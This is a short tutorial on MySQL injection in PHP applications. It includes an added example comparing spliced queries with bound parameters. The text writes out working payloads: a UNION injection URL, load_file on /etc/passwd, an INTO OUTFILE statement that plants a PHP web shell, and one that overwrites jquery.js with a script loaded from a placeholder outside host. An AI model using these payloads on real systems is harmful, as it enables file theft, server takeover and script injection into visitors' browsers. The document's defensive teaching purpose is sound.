Operating system files exposed through MySQL injection

The most typical MySQL injection scenario is unfiltered parameters. For example, a typical PHP statement that selects one user's information for display:

$sql = "select * from  user where id={$_GET['id']}";

The user only needs to modify the URL in the browser address bar, for example by appending to id=23:

http://xxx.com/xxx?id=23 union all select * from user;

This returns all users.

The natural way to avoid this is parameter filtering, which can be done with mysql_real_escape_string in the database driver interface. Of course, the safest approach is to write the code with a framework, since frameworks already take good precautions against MySQL injection. Even with a framework, though, remember to avoid hand-built SQL statements: whenever you splice strings into SQL, you must consider the injection problem.
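The spliced statement above next to a bound-parameter version, as an added example that is not part of the original page. It assumes PDO with an in-memory SQLite database standing in for MySQL so that it runs offline; the table rows and the function names find_user_spliced and find_user_bound are constructed for illustration.

```php
<?php
// Added example. Assumption: an in-memory SQLite database stands in for MySQL
// so the script runs offline; the PDO calls are the same with a MySQL DSN.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('create table user (id integer primary key, name text)');
$pdo->exec("insert into user values (23, 'alice'), (24, 'bob'), (25, 'carol')"); // constructed rows

// The page's pattern: the raw parameter is spliced into the statement text.
function find_user_spliced(PDO $pdo, string $id): array {
    $sql = "select * from user where id={$id}";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: check the type first, then bind the value as data, not as SQL.
// Escaping alone would not help with the spliced form: the payload contains
// no quote characters and id is placed in the statement unquoted.
function find_user_bound(PDO $pdo, string $id): array {
    if (!ctype_digit($id)) {
        return []; // reject anything that is not a plain non-negative integer
    }
    $stmt = $pdo->prepare('select * from user where id = :id');
    $stmt->bindValue(':id', (int)$id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$payload = '23 union all select * from user;'; // the id value from the page's URL

printf("spliced, id=23:   %d row(s)\n", count(find_user_spliced($pdo, '23')));
printf("spliced, payload: %d row(s)\n", count(find_user_spliced($pdo, $payload)));
printf("bound,   id=23:   %d row(s)\n", count(find_user_bound($pdo, '23')));
printf("bound,   payload: %d row(s)\n", count(find_user_bound($pdo, $payload)));
```

The spliced version returns extra rows for the payload because the UNION becomes part of the statement; the bound version never lets the parameter reach the SQL parser as syntax.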

What I want to point out here is that MySQL also has a function that can load a file and display its contents, for example:

select load_file('/etc/passwd');

The natural way to avoid this problem is to do parameter filtering.

MySQL can also write to files, for example:

select '<?php system(\'cat /etc/passwd\'); ?>' into outfile '/data/web/www/command.php';

The user can then request command.php by URL and view the user information of the Linux system. Of course, the same method can also inject code into every JS file of the website.

Besides parameter filtering, this problem can also be avoided by running MySQL under the mysql user while the website files belong to the apache user or www user, and by not simply setting all file permissions to 777.

Windows users have it worse. If the code is written by hand with the native functions and does not filter the parameters, it is very simple to inject code into the website's JS, for example:

select '<script src=\'http://xxxx.xxx.com/xxx.js\'>' into outfile 'D:\\web\\www\\htdocs\\js\\jquery.js';

This statement will inject dangerous JS code into jquery.js. Of course, a PHP file can also be written and then executed. Such a file can do anything, because a PHP file can operate on the server's files.
